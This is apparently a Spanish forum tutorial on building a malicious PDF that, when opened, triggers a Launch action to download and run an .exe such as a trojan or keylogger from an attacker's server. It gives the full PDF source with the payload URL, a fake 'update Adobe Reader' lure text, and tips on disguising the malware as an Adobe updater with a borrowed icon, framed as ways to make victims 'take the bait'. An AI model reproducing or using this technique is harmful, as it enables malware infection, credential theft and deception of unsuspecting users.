Ejecutar *.exe al abrir un PDF
Voy a mostrar como poder ejecutar un archivo *.exe al abrir un archivo PDF, el proceso va a ser el siguiente: La víctima, va a abrir el PDF de manera normal, pero le va a salir una ventana de advertencia diciendo que necesita actualizar el Adobe Reader, y va a salir una ventanita con la direccion y las opciones OK y Cancel, la mayoria de las personas no lee detenidamente el contenido de estos mensajes y dice.... Que me pide actualizar, pues lo actualizo. En este momento se realiza la descarga de nuestro archivo *.exe, del servidor FTP al que lo hayamos subido.
Necesitamos:
1. Nuestro *.exe (troyano, keylogger, bot, etc...)
2. Un FTP.
Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato "ftp.miftp/server_troyano.exe" también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso NO sirve ni megaupload, ni rapidshare, etc...
Vamos a: Inicio --> ejecutar --> notepad.exe y pegamos este código:
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Texto que quieren que aparezca en su PDF de fondo)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (http://www.FTP-gratuito.com/server_troyano.exe)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF
Debe guardar el archivo resultante en formato PDF, dan a guardar como y seleccionan todos los archivos y de extensión le ponene .pdf. Tambien deben modificar los campos que pone "Texto que quieren que aparezca en su PDF de fondo" y ponen el texto deseado yo pongo: "Error, necesita actualizar su versión, para ver el contenido del archivo, acepte la descarga de esta ventana emergente", creanme, la gente pica. el otro campo a modifcar es el de "http://www.FTP-gratuito.com/server_troyano.exe" en el cual deben poner su servidor FTP con la descarga directa del archivo, para que no vean nada más que la ventana que pone Aceptar la descarga, yo en mi caso compilo el programa infeccioso en un archivo rar con el nombre de Adobe_Reader_Update.exe y con el icono de Adobe Reader para hacerlo mucho más creible.
Icono de Adobe Reader: http://www.iconspedia.com/dload.php?up_id=142122
El archivo descargado así queda mucho más creible.
Así de simple.
SI LES SIRVIÓ, AGRADEZCAN